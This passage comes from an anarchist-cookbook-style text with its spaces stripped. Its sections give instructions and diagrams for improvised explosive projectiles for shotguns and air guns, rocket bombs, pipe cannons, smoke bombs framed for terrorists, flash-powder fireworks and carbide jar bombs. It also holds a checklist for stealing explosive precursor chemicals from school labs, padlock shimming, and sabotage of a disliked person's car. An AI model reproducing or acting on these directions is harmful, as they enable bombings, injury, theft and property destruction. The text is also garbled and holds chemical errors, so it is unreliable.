placethedowelbackintheshotgun.Thebomborincendiarydeviceshouldbeon theendofthedowel. Makesurethatthedevicehasalongenoughfuse,lightthefuse,andfirethe shotgun.Iftheprojectileisnottooheavy,rangesofupto300ftare possible.Adiagramofashotgunprojectileisshownbelow: ____ ||| ||| |||bomb,securelytapedtodowel ||| ||__| ||| |||fuse |||

|| || || ||dowel || || || ||insertthisendintoshotgun || || Special"grenadelauncherblanks"shouldbeuseduseofregularblank ammunitionmaycausethedevicetolandperilouslyclosetotheuser. SPECIALAMMUNITIONFORCOMPRESSEDAIR/GASWEAPONS Thissectiondealswiththemanufactureofspecialammunitionforcompressedair orcompressedgasweapons,suchaspumpBBguns,COBBguns,and.22calpellet guns.Theseweapons,althoughusuallythoughtofaskidstoys,canbemadeinto ratherdangerousweapons. SPECIALAMMUNITIONFORBBGUNS ABBgun,forthismanuscript,willbeconsideredanytypeofrifleorpistol thatusescompressedairorCOgastofireaprojectilewithacaliberof.177, eitherBB,orleadpellet.Suchgunscanhavealmostashighamuzzlevelocity asabulletfiringrifle.Becauseofthespeedatwhicha.177caliber projectileflies,animpactdetonatingprojectilecaneasilybemadethathasa caliberof.177. Mostammunitionforgunsofgreaterthan.22caliberuseprimerstoignitethe powderinthebullet.Theseprimerscanbeboughtatgunstores,sincemany peopleliketoreloadtheirownbullets.Suchprimersdetonatewhenstruckby thefiringpinofagun.Theywillalsodetonateiftheyarethrownatahard surfaceatagreatspeed. Usually,theywillalsofitinthebarrelofa.177calibergun.Iftheyare insertedflatendfirst,theywilldetonatewhenthegunisfiredatahard surface.Ifsuchaprimerisattachedtoapieceofthinmetaltubing,suchas thatusedinanantenna,thetubecanbefilledwithanexplosive,besealed, andfiredfromaBBgun.Adiagramofsuchaprojectileappearsbelow: _____primers_______ || || || VV ____________ |________________________| |******explosive*******|}tasselor |________________________|cotton |__________| ^ | | |_______antennatubing Thefrontprimerisattachedtothetubingwithadropofsuperglue.Thetubing isthenfilledwithanexplosive,andtherearprimerisgluedon.Finally,a tassel,orasmallpieceofcottonisgluedtotherearprimer,toinsurethat theprojectilestrikesonthefrontprimer.Theentireprojectileshouldbe about3/4ofaninchlong. SPECIALAMMUNITIONFOR.22CALIBERPELLETGUNS

A.22caliberpelletgunusuallyisequivalenttoa.22calrifle,atclose ranges.Becauseofthis,relativelylargeexplosiveprojectilescanbeadapted forusewith.22caliberairrifles.Adesignsimilartothatusedinthe beginingofthisdocumentissuitable,sincesomecapsulesareabout.22caliber orsmaller.Or,adesignsimilartothatinthisdocumentcouldbeused,only onewouldhavetopurchaseblackpowderpercussioncaps,insteadofammunition primers,sincetherearepercussioncapsthatareabout.22caliber.A#11cap istoosmall,butanythinglargerwilldonicely. 210.Rocketry byExodus

Rocketsandcannonaregenerallythoughtofasheavyartillery.Perpetratorsof violencedonotusuallyemploysuchdevices,becausetheyaredifficultor impossibletoacquire.Theyarenot,however,impossibletomake.Anyindividual whocanmakeorbuyblackpowderorpyrodexcanmakesuchthings.Aterrorist withacannonorlargerocketis,indeed,somethingtofear. ROCKETS RocketswerefirstdevelopedbytheChineseseveralhundredyearsbeforethe mythofChristbegan.Theywereusedforentertainmentintheformoffireworks. Theywerenotusuallyusedformilitarypurposesbecausetheywereinaccurate, expensive,andunpredictable.Inmoderntimes,however,rocketsareused constantlybythemilitary,sincetheyarecheap,reliable,andhavenorecoil. Perpetratorsofviolence,fortunately,cannotobtainmilitaryrockets,butthey canmakeorbuyrocketengines.Modelrocketryisapopularhobbyofthespace age,andtolauncharocket,anengineisrequired.Estes,asubsidiaryof Damon,istheleadingmanufacturerofmodelrocketsandrocketengines.Their mostpowerfulengine,the"D"engine,candevelopalmost12lbsofthrust; enoughtosendarelativelylargeexplosivechargeasignificantdistance.Other companies,suchasCenturi,produceevenlargerrocketengines,whichdevelopup to30lbsofthrust.Thesemodelrocketenginesarequitereliable,andare designedtobefiredelectrically.Mostmodelrocketengineshavethreebasic sections.Thediagrambelowwillhelpexplainthem. _________________________________________________________ |_________________________________________________________|cardboard \clay||***|....|c|casing \_______||***|...|l| _______thrust|smoke|eject|a| /clay||***|....|y| /________|_____________________|_______|________|_|_______ |_________________________________________________________|cardboard casing Theclaynozzleiswheretheigniterisinserted.Whenthearealabeled"thrust" isignited,the"thrust"material,usuallyalargesinglegrainofapropellant suchasblackpowderorpyrodex,burns,forcinglargevolumesofhot,rapidly expandinggassesoutthenarrownozzle,pushingtherocketforward. Afterthematerialhasbeenconsumed,thesmokesectionoftheengineis ignited.Itisusuallyaslowburningmaterial,similartoblackpowderthathas hadvariouscompoundsaddedtoittoproducevisiblesmoke,usuallyblack, white,oryellowincolor.Thissectionexistssothattherocketwillbeseen whenitreachesitsmaximumaltitude,orapogee. Whenitisburnedup,itignitestheejectioncharge,labeled"eject".The ejectionchargeisfinelypowderedblackpowder.Itburnsveryrapidly, exploding,ineffect.Theexplosionoftheejectionchargepushesoutthe parachuteofthemodelrocket.Itcouldalsobeusedtoignitethefuseofa bomb... Rocketengineshavetheirownpeculiarlabelingsystem.Typicalenginelabels

are:1/4A2T,1/2A3T,A83,B64,C67,andD125.Theletterisanindicator ofthepowerofanengine."B"enginesaretwiceaspowerfulas"A"engines,and "C"enginesaretwiceaspowerfulas"B"engines,andsoon.Thenumber followingtheletteristheapproximatethrustoftheengine,inpounds.the finalnumberandletteristhetimedelay,fromthetimethatthethrustperiod ofengineburnendsuntiltheejectionchargefires;"3T"indicatesa3second delay. NOTE:Anextremelyeffectiverocketpropellantcanbemadebymixingaluminum dustwithammoniumperchlorateandaverysmallamountofironoxide.The mixtureisboundtogetherbyanepoxy. BASICROCKETBOMB Arocketbombissimplywhatthenameimplies:abombthatisdeliveredtoits targetbymeansofarocket.Mostpeoplewhowouldmakesuchadevicewoulduse amodelrocketenginetopowerthedevice.Bycuttingfinsfrombalsawoodand gluingthemtoalargerocketengine,suchastheEstes"C"engine,abasic rocketcouldbeconstructed.Then,byattachinga"cratermaker",orCO cartridgebombtotherocket,abombwouldbeadded.Toinsurethatthefuseof the"cratermaker"ignited,theclayovertheejectionchargeoftheengine shouldbescrapedoffwithaplastictool.Thefuseofthebombshouldbe touchingtheejectioncharge,asshownbelow. ____________rocketengine |_________cratermaker || || V| _______________________________V_ |_______________________________|______________________ \||***|::::|/###########\ \__||***|::::|___/###########\ __|***|::::|fuse##explosive##) /||***|::::|___###########/ /___|____________|___|____|____\_______________________/ |_______________________________| thrust> smoke>*** ejectioncharge>:::: Ducttapeisthebestwaytoattachthecratermakertotherocketengine.Note inthediagramtheabsenceoftheclayovertheejectionchargeManydifferent typesofexplosivepayloadscanbeattachedtotherocket,suchasahigh explosive,anincendiarydevice,orachemicalfirebottle. Eitherfourorthreefinsmustbegluedtotherocketenginetoinsurethatthe rocketfliesstraight.Thefinsshouldlooklikethefollowingdiagram: |\ |\ |\ |\<gluethistorocketengine |\ |\ |\ || || || leadingedge| >|

|| ||trailingedge ||< || || || || \_____/ Theleadingedgeandtrailingedgeshouldbesandedwithsandpapersothatthey arerounded.Thiswillhelpmaketherocketflystraight.Atwoinchlong sectionofaplasticstrawcanbeattachedtotherockettolaunchitfrom.A clotheshangercanbecutandmadeintoalaunchrod.Thesegmentofaplastic strawshouldbegluedtotherocketengineadjacenttooneofthefinsofthe rocket.Afrontviewofacompletedrocketbombisshownbelow. | fin|<fin ||| ||| |__|__| V/\V || \_____/ |o<segmentofplasticstraw | | |<fin | | Bycuttingacoathangerattheindicatedarrows,andbendingit,alaunchrod canbemade.Afterafuseisinsertedintheengine,therocketissimplyslid downthelaunchrod,whichisputthroughthesegmentofplasticstraw.The rocketshouldslideeasilyalongacoathanger,suchastheoneillustratedon thefollowingpage: ____ /\ || cuthere_____| || || |/\ V/\ _________________/\________________ /\ /\ /____________________________________________\ ^ | | andhere______| Bendwiretothisshape: _______insertintostraw | | | V ____________________________________________

\ \ \ \ \<bendheretoadjustflightangle | | | | | |<putthisendinground | LONGRANGEROCKETBOMB Longrangerocketscanbemadebyusingmultistagerockets.Modelrocket engineswithan"0"foratimedelayaredesignedforuseinmultistage rockets.AnenginesuchastheD120isanexcellentexampleofsuchanengine. Immediatelyafterthethrustperiodisover,theejectionchargeexplodes.If anotherengineisplaceddirectlyagainstthebackofan"0"engine,the explosionoftheejectionchargewillsendhotgassesandburningparticlesinto thenozzleoftheengineaboveit,andignitethethrustsection.Thiswillpush theused"0"engineoffoftherocket,causinganoveralllossofweight. Themainadvantageofamultistagerocketisthatitlosesweightastravels, anditgainsvelocity.Multistagerocketsmustbedesignedsomewhatdifferently thanasinglestagerocket,since,inorderforarocketstoflystraight,their centerofgravitymustbeaheadoftheircenterofdrag.Thisisaccomplishedby addingweighttothefrontoftherocket,orbymovingthecenterofdragback byputtingfinsontherocketthatarewellbehindtherocket.Adiagramofa multistagerocketappearsonthefollowingpage: ___ /\ || |C| |M|CM:CraterMaker || || |___| || || || |C|C65rocketengine /|6|\ /|||\ /|5|\ /|___|\fin //||\\ //||\\ //||\\ //|C|\\ |/|6|\| |/|||\| |/|0|\| |/|___|\| |/\| \______/^\______/fin | | | |

C60rocketengine Thefuseisputinthebottomengine. Two,three,orevenfourstagescanbeaddedtoarocketbombtogiveita longerrange.Itisimportant,however,thatforeachadditionalstage,thefin areagetslarger. 211.BasicPipeCannon byExodus

Asimplecannoncanbemadefromathickpipebyalmostanyone.Theonly difficultpartisfindingapipethatisextremelysmoothonitsinterior.This isabsolutelynecessary;otherwise,theprojectilemayjam.Copperoraluminum pipingisusuallysmoothenough,butitmustalsobeextremelythickto withstandthepressuredevelopedbytheexpandinghotgassesinacannon. IfoneusesaprojectilesuchasaCOcartridge,sincesuchaprojectilecanbe madetoexplode,apipethatisabout12feetlongisideal.Suchapipe MUSThavewallsthatareatleast1/3toaninchthick,andbeverysmoothon theinterior.Ifpossible,screwanendplugintothepipe.Otherwise,thepipe mustbecrimpedandfoldedclosed,withoutcrackingortearingthepipe.Asmall holeisdrilledinthebackofthepipenearthecrimporendplug.Then,all thatneedbedoneisfillthepipewithabouttwoteaspoonsofgradeblackpowder orpyrodex,insertafuse,packitlightlybyrammingawadoftissuepaperdown thebarrel,anddropinaCOcartridge.Bracethecannonsecurelyagainsta strongstructure,lightthefuse,andrun.Ifthepersonislucky,hewillnot haveoverchargedthecannon,andhewillnotbehitbypiecesofexploding barrel.Suchacannonwouldlooklikethis: __________________fusehole | | V ________________________________________________________________ ||_____________________________________________________________| |endplug|powder|t.p.|COcartridge |______|______|____|____________________________________________ |_|______________________________________________________________| AnexplodingprojectilecanbemadeforthistypeofcannonwithaCO cartridge.Itisrelativelysimpletodo.Justmakeacratermaker,and constructitsuchthatthefuseprojectsaboutaninchfromtheendofthe cartridge.Then,wrapthefusewithducttape,coveringitentirely,exceptfor asmallamountattheend.Putthisinthepipecannonwithoutusingatissue paperpackingwad. Whenthecannonisfired,itwillignitetheendofthefuse,andshoottheCO cartridge.Theexplosivefilledcartridgewillexplodeinaboutthreeseconds, ifallgoeswell.Suchaprojectilewouldlooklikethis: ___ () |C| |M| || || \/ []<tapedfuse [] [] !<Barefuse(addmatcheads) ROCKETFIRINGCANNON

Arocketfiringcannoncanbemadeexactlylikeanormalcannon;theonly differenceistheammunition.Arocketfiredfromacannonwillflyfurtherthan arocketalone,sincetheactionofshootingitovercomestheinitialinertia.A rocketthatislaunchedwhenitismovingwillgofurtherthanonethatis launchedwhenitisstationary.Sucharocketwouldresembleanormalrocket bomb,exceptitwouldhavenofins.Itwouldlookliketheimagebelow.Thefuse onsuchadevicewould,obviously,beshort,butitwouldnotbeigniteduntil therocket'sejectionchargeexploded.Thus,thedelaybeforetheejection charge,ineffect,becomesthedelaybeforethebombexplodes.Notethatnofuse needbeputintherocket;theburningpowderinthecannonwilligniteit,and simultaneouslypushtherocketoutofthecannonatahighvelocity. ___ /\ || |C| |M| || || |___| |E| |N| |G| |I| |N| |E| |___| REINFORCEDPIPECANNON Inhighschool,afriendandIbuiltcannonsandlaunchedCOcartridges,etc, etc.However,thedesignofthecannoniswhatIwanttoaddhere.Itwasmade fromplainsteelwaterpipe,steelwire,andlead. Hereisacrosssection: _______ || |xxxxx_____________________________________________2"IDpipe ||_________________________________________________ ||....................<steelwire} ||_____}3/4"IDpipe this|||xxx______________________________________}_________________ wire||||__________________________________________________________ holds||....|| itup|>|....|| inthe||||__________________________________________________________ cooker|||xxx________________________________________________________ |||____} ||.....................}<castlead ||_______________________________________________}_ ||_____________________________________________ |xxxxx |_____| Wedugintothesideofasandpileandbuiltachimneyoutoffirebrick.Then westoodtheassembledpipeandwireonendinthechimney,sittingonsome bricks.Wethenhadablowtorchheatingupthechimney,sothatthepipewasred hot.Thenwepouredmoltenleadintothespacebetweenthepipes.Ifthecaps aren'tscrewedonrealtight,someoftheleadwillleakout.Ifthathappens, turnofftheblowtorchandthepipewillcoolenoughandtheleadwillstiffen andstoptheleak. Weusedhomemadeandcommercialblackpowder,andslowsmokelessshotgunpowder inthisthing.Afterhundredsofshotswecutitupandtherewasnoevidenceof

cracksorswellingoftheinnerpipe. 212.SmokeBombs byExodus

Onetypeofpyrotechnicdevicethatmightbeemployedbyaterroristinmanyway wouldbeasmokebomb.Suchadevicecouldconcealthegetawayroute,orcausea diversion,orsimplyprovidecover.Suchadevice,wereittoproduceenough smokethatsmelledbadenough,couldforcetheevacuationofabuilding,for example.Smokebombsarenotdifficulttomake.Althoughthemilitarysmoke bombsemploypowderedwhitephosphorusortitaniumcompounds,suchmaterialsare usuallyunavailabletoeventhemostwellequippedterrorist.Instead,he/she wouldhavetomakethesmokebombforthemselves. Mosthomemadesmokebombsusuallyemploysometypeofbasepowder,suchasblack powderorpyrodex,tosupportcombustion.Thebasematerialwillburnwell,and provideheattocausetheothermaterialsinthedevicetoburn,butnot completelyorcleanly.Tablesugar,mixedwithsulfurandabasematerial, produceslargeamountsofsmoke.Sawdust,especiallyifithasasmallamountof oilinit,andabasepowderworkswellalso.Otherexcellentsmokeingredients aresmallpiecesofrubber,finelygroundplastics,andmanychemicalmixtures. Thematerialinroadflarescanbemixedwithsugarandsulfurandabasepowder producesmuchsmoke.Mostofthefueloxidizermixtures,iftheratioisnot correct,producemuchsmokewhenaddedtoabasepowder.Thelistof possibilitiesgoesonandon.Thetricktoasuccessfulsmokebombalsoliesin thecontainerused.Aplasticcylinderworkswell,andcontributestothesmoke produced.Theholeinthesmokebombwherethefuseentersmustbelargeenough toallowthematerialtoburnwithoutcausinganexplosion.Thisisanotherplus forplasticcontainers,sincetheywillmeltandburnwhenthesmokematerial ignites,producinganopeninglargeenoughtopreventanexplosion. SIMPLESMOKE Thefollowingreactionshouldproduceafairamountofsmoke.Sincethis reactionisnotallthatdangerousyoucanuselargeramountsifnecessary 6pt.ZINCPOWDER 1pt.SULFURPOWDER

Insertaredhotwireintothepile,stepback. COLOREDFLAMES Coloredflamescanoftenbeusedasasignalingdeviceforterrorists.By puttingaballofcoloredflamematerialinarocket;therocket,whenthe ejectionchargefires,willsendoutaburningcoloredball.Thematerialsthat producethedifferentcolorsofflamesappearbelow. COLOR MATERIAL USEDIN Red StrontiumSalts RoadFlares [StrontiumNitrate] RedSparklers Green BariumSalts GreenSparklers [BariumNitrate] Yellow SodiumSalts GoldSparklers [SodiumNitrate] Blue PowderedCopper BlueSparklers OldPennies White PowderedMagnesiumor Firestarters Aluminum AluminumFoil Purple PotassiumPermanganate PurpleFountains TreatingSewage 213.Firecrackers byExodus

Asimplefirecrackercanbemadefromcardboardtubingandepoxy.The instructionsarebelow: 1. Cutasmallpieceofcardboardtubingfromthetubeyouareusing."Small" meansanythinglessthan4timesthediameterofthetube. 2. Setthesectionoftubingdownonapieceofwaxpaper,andfillitwith epoxyandthedryingagenttoaheightof3/4thediameterofthetubing.Allow theepoxytodrytomaximumhardness,asspecifiedonthepackage. 3. Whenitisdry,putasmallholeinthemiddleofthetube,andinserta desiredlengthoffuse. 4. Fillthetubewithanytypeofflamesensitiveexplosive.Flashpowder, pyrodex,blackpowder,potassiumpicrate,leadazide,nitrocellulose,oranyof thefastburningfueloxidizermixtureswilldonicely.Fillthetubealmostto thetop. 5. Packtheexplosivetightlyinthetubewithawadoftissuepaperanda pencilorothersuitableramrod.Besuretoleaveenoughspaceformoreepoxy. 6. Filltheremainderofthetubewiththeepoxyandhardener,andallowit todry. 7. Forthosewhowishtomakespectacularfirecrackers,alwaysuseflash powder,mixedwithasmallamountofothermaterialforcolors.Bycrushingthe materialonasparkler,andaddingittotheflashpowder,theexplosionwillbe thesamecolorasthesparkler.Byaddingsmallchunksofsparklermaterial,the devicewillthrowoutcoloredburningsparks,ofthesamecolorasthesparkler. Byaddingpowderediron,orangesparkswillbeproduced.Whitesparkscanbe producedfrommagnesiumshavings,orfromsmall,LIGHTLYcrumpledballsof aluminumfoil. Example:SupposeIwishtomakeafirecrackerthatwillexplodewithared flash,andthrowoutwhitesparks. First,Iwouldtakearoadflare,andfinelypowderthematerialinside it.Or,Icouldtakearedsparkler,andfinelypowderit. Then,Iwouldmixasmallamountofthismaterialwiththeflashpowder. NOTE:FLASHPOWDERMAYREACTWITHSOMEMATERIALSTHATITISMIXEDWITH,AND EXPLODESPONTANEOUSLY!Iwouldmixitinaratioof9partsflashpowderto1 partofflareorsparklermaterial,andaddabout15smallballsofaluminum foilIwouldstorethematerialinaplasticbagovernightoutsideofthehouse, tomakesurethatthestuffdoesn'treact.Then,inthemorning,Iwouldtesta smallamountofit,andifitwassatisfactory,Iwouldputitinthe firecracker. 8. Ifthistypeoffirecrackerismountedonarocketengine,professionalto semiprofessionaldisplayscanbeproduced. SKYROCKETS Animpressivehomemadeskyrocketcaneasilybemadeinthehomefrommodel rocketengines.Estesenginesarerecommended. 1. BuyanEstesModelRocketEngineofthedesiredsize,rememberingthatthe powerdoubleswitheachletter. 2. Eitherbuyasectionofbodytubeformodelrocketsthatexactlyfitsthe engine,ormakeatubefromseveralthicknessesofpaperandglue. 3. Scrapeouttheclaybackingonthebackoftheengine,sothatthepowder isexposed.Gluethetubetotheengine,sothatthetubecoversatleasthalf theengine.Pourasmallchargeofflashpowderinthetube,aboutaninch. 4. Byaddingmaterialsasdetailedinthesectiononfirecrackers,various typesofeffectscanbeproduced. 5. ByputtingJumpingJacksorbottlerocketswithoutthestickinthetube,

spectaculardisplayswithmovingfireballsorMRV'scanbeproduced. 6. Finally,bymountingmanyhomemadefirecrackersonthetubewiththe fusesinthetube,multiplecoloredburstscanbemade. ROMANCANDLES Romancandlesareimpressivetowatch.Theyarerelativelydifficulttomake, comparedtotheothertypesofhomemadefireworks,buttheyarewellworththe trouble. 1. Buyainchthickmodelrocketbodytube,andreinforceitwithseveral layersofpaperand/ormaskingtape.Thismustbedonetopreventthetubefrom exploding.Cutthetubeintoabout10inchlengths. 2. Putthetubeonasheetofwaxpaper,andsealoneendwithepoxyandthe dryingagent.Aboutofaninchissufficient. 3. Putaholeinthetubejustabovethebottomlayerofepoxy,andinserta desiredlengthofwaterprooffuse.Makesurethatthefusefitstightly. 4. Pourabout1inchofpyrodexorgunpowderdowntheopenendofthetube. 5. Makeaballbypowderingabouttwo6inchsparklersofthedesiredcolor. Mixthispowderwithasmallamountofflashpowderandasmallamountof pyrodex,tohaveafinalratio(byvolume)of60%sparklermaterial/20%flash powder/20%pyrodex.Aftermixingthepowderswell,addwater,onedropata time,andmixingcontinuously,untiladamppasteisformed. Thispasteshouldbemoldablebyhand,andshouldretainitsshapewhen leftalone.Makeaballoutofthepastethatjustfitsintothetube.Allowthe balltodry. 6. Whenitisdry,droptheballdownthetube.Itshouldslidedownfairly easily.Putasmallwadoftissuepaperinthetube,andpackitgentlyagainst theballwithapencil. 7. Whenreadytouse,putthecandleinaholeintheground,pointedina safedirection,lightthefuse,andrun.Ifthedeviceworks,acoloredfireball shouldshootoutofthetubetoaheightofabout30feet.Thisheightcanbe increasedbyaddingaslightlylargerpowderchargeinstep4,orbyusinga slightlylongertube. 8. Iftheballdoesnotignite,addslightlymorepyrodexinstep5. 9. Theballsmadeforromancandlesalsofunctionverywellinrockets, producinganeffectoffallingcoloredfireballs. 214.SuppliersII byExodus

Most,ifnotall,oftheinformationinthispublicationcanbeobtainedthrough apublicoruniversitylibrary.Therearealsomanypublicationsthatareput outbypeoplewhowanttomakemoneybytellingotherpeoplehowtomake explosivesathome.Addsforsuchappearfrequentlyinparamilitarymagazines andnewspapers.Thislistispresentedtoshowthelargenumberofplacesthat informationandmaterialscanbepurchasedfrom.Italsoincludesfireworks companiesandthelike. COMPANYNAMEANDADDRESS WHATCOMPANYSELLS FULLAUTOCO.INC. EXPLOSIVERECIPES POBOX1881 PAPERTUBING MURFREESBORO,TN37133 UNLIMITED CHEMICALSANDFUSE POBOX1378SN HERMISTON,OR97838 AMERICANFIREWORKSNEWS FIREWORKSNEWSMAGAZINEWITH SRBOX30 SOURCESANDTECHNIQUES DINGMAN'SFERRY,PA18328

BARNETTINTERNATIONALINC. BOWS,CROSSBOWS,ARCHERYMATERIALS, 125RUNNELSSTREET AIRRIFLES POBOX226 PORTHURON,MI48060 CROSSMANAIRGUNS AIRGUNS POBOX22927 ROCHESTER,NY14692 R.ALLEN PROFESSIONALFIREWORKSCONSTRUCTION POBOX146 BOOKS&FORMULAS WILLOWGROVE,PA19090 MJDISTRIBUTING POBOX10585 YAKIMA,WA98909 FIREWORKSFORMULAS

EXECUTIVEPROTECTIONPRODUCTSINC TEARGASGRENADES, 316CALIFORNIAAVE PROTECTIONDEVICES RENO,NV89509 BADGERFIREWORKSCO.INC POBOX1451 JANESVILLE,WI53547 CLASS"B"AND"C"FIREWORKS

NEWENGLANDFIREWORKSCOINC CLASS"C"FIREWORKS POBOX3504 STAMFORD,CT06095 RAINBOWTRAIL CLASS"C"FIREWORKS POBOX581 EDGEMONT,PA19028 STONINGTONFIREWORKSINC CLASS"C"AND"B"FIREWORKS 4010NEWWILSEYBAYU.25ROAD RAPIDRIVER,MI49878 WINDYCITYFIREWORKSINC POBOX11 (GOODPRICES!) ROCHESTER,IN46975 CLASS"C"AND"B"FIREWORKS

BOOKS THEANARCHISTCOOKBOOK (highlycirculated) THEIMPROVISEDMUNITIONSMANUAL (formulaswork,butputmakeratrisk) MILITARYEXPLOSIVES Twomanualsofinterest:Duponts"Blaster'sHandbook",$20manualmainlyuseful forrockandseismographicoperations.Atlas's"PowderManual"or"Manualof RockBlasting"(Iforgetthetitle,it'sintheoffice).Thisisa$60book, wellworththecash,dealingwiththeabovetwotopics,plusdemolitions,and nonquarryblasting. 215.ChecklistforRaidsonLabs byExodus

Intheend,theseriousterroristwouldprobablyrealizethatifhe/shewishes tomakeatrulyusefulexplosive,heorshewillhavetostealthechemicalsto maketheexplosivefromalab.Alistofsuchchemicalsinorderofpriority wouldprobablyresemblethefollowing:

LIQUIDSSOLIDS ____NitricAcid____PotassiumPerchlorate ____SulfuricAcid____PotassiumChlorate ____95%Ethanol____PicricAcid(usuallyapowder) ____Toluene____AmmoniumNitrate ____PerchloricAcid____PowderedMagnesium ____HydrochloricAcid____PowderedAluminum ____PotassiumPermanganate GASES____Sulfur(flowersof) ____Hydrogen____Mercury ____Oxygen____PotassiumNitrate ____Chlorine____PotassiumHydroxide ____CarbonDioxide____Phosphorus ____SodiumAzide ____LeadAcetate ____BariumNitrate Printthissheetoutandcarryitwithyou!Memorizeit,anything.Itis INVALUABLE.Allofthesechemicalsshouldbecarriedinyourschoollab.Happy hunting.:) 216.MiscAnarchy byExodus

TennisballcannonsandotherinformationfromtheUsenet.TheUsenetisa worldwidenetworkof15,000machinesandover500,000peopleAndgrowing! Atthistime(twelveyearsago)mostsoftdrinkcanswererolledtinratherthan themoldedaluminum.Wewouldcutthetopsandbottomsoffofabunchofthem andtapethemtogetherwithducttape,formingatubeoftwofeetormore. Attheendwewouldtapeacanwiththebottomintact,moreholespunched(with acanopener)aroundthetop,andasmallholeinthesideatthebase.Wethen fastenedthiscontraptiontoatripodsowecouldaimitreliably.Anyobject thatcamesomewhatclosetofillingthetubewasthenplacedtherein. Intheshop,weusedtheclockasatargetandanemptyplasticsolderspoolas ammunition,withtapeovertheendsofthecenterholeandsometimesfilledwith washersforweight.Whentakentopartiesorpicnics,wewouldusewhateverwas handy.Hotdogrollsornapkinsfilledwithpotatochipsprovidedspectacular entertainment. Onceloaded,asmallamountoflighterfluidwaspouredintotheholeinthe sideoftheendcanandallowedtovaporizeforafewmoments.The"firecontrol technician"wouldannounce"FireintheHole"andigniteit. BOOM!Whoosh!Theclockneverworkedafterthat! Ourversionofthepotatochipcannon,originallydesignedaroundthePringles potatochipcan,wasbuiltsimilarly.Oursusedcokecans,sixwiththetopand bottomremoved,andtheseventhhadBottleopenerholesallaroundoneend,the topofthiscanwascoveredwithagridorpieceofwirescreeningtokeepthe tennisballfromfallingallthewaytothebottom.Thiswasspiralwrappedwith atleasttworollsofducttape. Awoodenshoulderrestandforwardhandgripwastapedtothetube.Forignition weusedlanternbatteriestoamodeltcoil,actuatedbyapushbuttononthe handgrip.Afreshwilsontennisballwasstuffedallthewaybacktothegrid, andadroportwooflighterfluidwasdroppedinoneoftwoholesintheend. Theignitionwirewaspokedthroughtheotherhole. Wewouldthenlieinambush,waitingforsomethingtomove.Whenfiredwiththe

properair/fuelmixture,asatisfyingthoomp!Atmaximumrangetheballwould travelabout100yardswitha45launchangle.Closeruptheballwouldleavea weltonanwarringopponent.Whenlaunchedatamovingcarthethudasithit thedoorwouldgenerallyrattleanyoneinside.Luckilywenevercompletedthe onethatshotgolfballs. MoreFunStuffforTerrorists CarbideBomb ThisisEXTREMELYDANGEROUS.Exerciseextremecaution....Obtainsomecalcium carbide.Thisisthestuffthatisusedincarbidelampsandcanbefoundat nearlyanyhardwarestore. Takeafewpiecesofthisstuff(itlookslikegravel)andputitinaglassjar withsomewater.Putalidontightly.Thecarbidewillreactwiththewaterto produceacetylenecarbonatewhichissimilartothegasusedincuttingtorches. Eventuallytheglasswithexplodefrominternalpressure.Ifyouleaveaburning ragnearby,youwillgetanicefireball! AutoExhaustFlameThrower Forthisone,allyouneedisacar,asparkplug,ignitionwireandaswitch. Installthesparkplugintothelastfourorfiveinchesofthetailpipeby drillingaholethattheplugcanscrewintoeasily.Attachthewire(thisis regularinsulatedwire)toonesideoftheswitchandtothesparkplug.The othersideoftheswitchisattachedtothepositiveterminalonthebattery. Withthecarrunning,simplyhittheswitchandwatchtheflamesfly!!!Againbe carefulthatnooneisbehindyou!Ihaveseensomeoftheseflamesgo20feet!! Balloons Balloonsarefuntoplaywithinchemlab,fillthemwiththegasthatyouget outofthetapsonthelabdesks,thentieuptheballoontight,anddropitout thewindowtotheburnoutsbelow,youknow,theonesthatarealwayssmoking, theylovetopopballoonswithlitcigarette....getthepicture?Good. 217.ComboLocksII byExodus

Firstofall,letmetellyouaboutthesetupofalock.Whenthelockis locked,thereisacurvedpieceofmetalwedgedinsidethelittlenotchonthe horseshoeshapedbar(knownastheshackle)thatispushedintothelockwhen youlockit. Tofreethiswedge,youusuallyhavetoturnthelocktothedesiredcombination andthepressureonthewedgeisreleasedthereforelettingthelockopen.I willnowtellyouhowtomakeapicksoyoucanopenalockwithouthavingto wasteallthattimeturningthecombination(thisalsohelpswhenyoudon'tknow thecombinationtobeginwith). Tobypassthishassle,simplytakeathinnedhairpin(fileitdown)oraopened outpieceofacollapsingantenna(theinsidediameterofthecurvedpieceof metalshouldbethesameasthediameteroftheshackleifthemetalistoo thick,usefinesandpapertothinitdown. Onceyouhaveyourhairpin(makesureit'smetal),taketheridgedsideand breakitoffrightbeforeitstartstomakeaUturnontothestraightside.The curvedpartcannowbeusedasahandle.Now,usingafile,filedowntheother enduntilitisfairlythin.Youshoulddothistomanyhairpinsandfilethem sotheyareofdifferentthicknessessoyoucanjimmyvariouslocks. Lookatalocktoseewhichsidethelockopensfrom.Ifyoucan'ttell,you willjusthavetotrybothsides.Whenyafindoutwhatsideitopensfrom,take thelockpickandstickthefiledendintotheinsideofthehorseshoeshaped

baronwhicheversidethelockopensfrom. Now,putpressureonthehandleofthelockpick(pushingdown,intothecrack) andpullthelockupanddown.Thelockwillthenopenbecausethepick separatedthewedgeandthenotchallowingittoopen. Also,thistechniqueworksbestonAmericanlocks.IhaveneverpickedaMaster lockbeforebecauseoftheshapeapressureofthewedgebutifanyonedoesit, letmeknowhowlongittook.Also,theMasterlockcasingisverytightsoya can'tgettheshimin. 218.MiscAnarchyII byRagnerRocker

Manyofyououtthereprobablyhavefantasiesofrevengeagainstteachers, principalsandotherpeoplewhoarejustassholes.Dependingonyourlevelof hatredofthispersonIwouldadvisethatyoudosomeofthesefollowing experiments: 1. Pouringdishsoapintothegastankofyourenemymanyofyoualready knowthatgasoline+dishsoap(e.g.joy,palmolive,etc.)formamixturecalled napalm.Nownapalmisajellylikesubstanceusedinbombs,flamethrowers, etc.Nowyoucanonlyguesswhatthismixturewoulddotosomeone'sfuel line!!!! 2. Spreadingdirtymotoroil/castoroilonsomeone'sexhaustpipewhenthe exhaustpipeheatsup(anditwill!!)themotoroilorcastoroilonthepipe willcausethick,disgustingsmoketooozeforthfromthebackofthatcar.Who knowsmaybehe/shemightbepulledoverandgivenaticket!! 3. LightBulbBomb

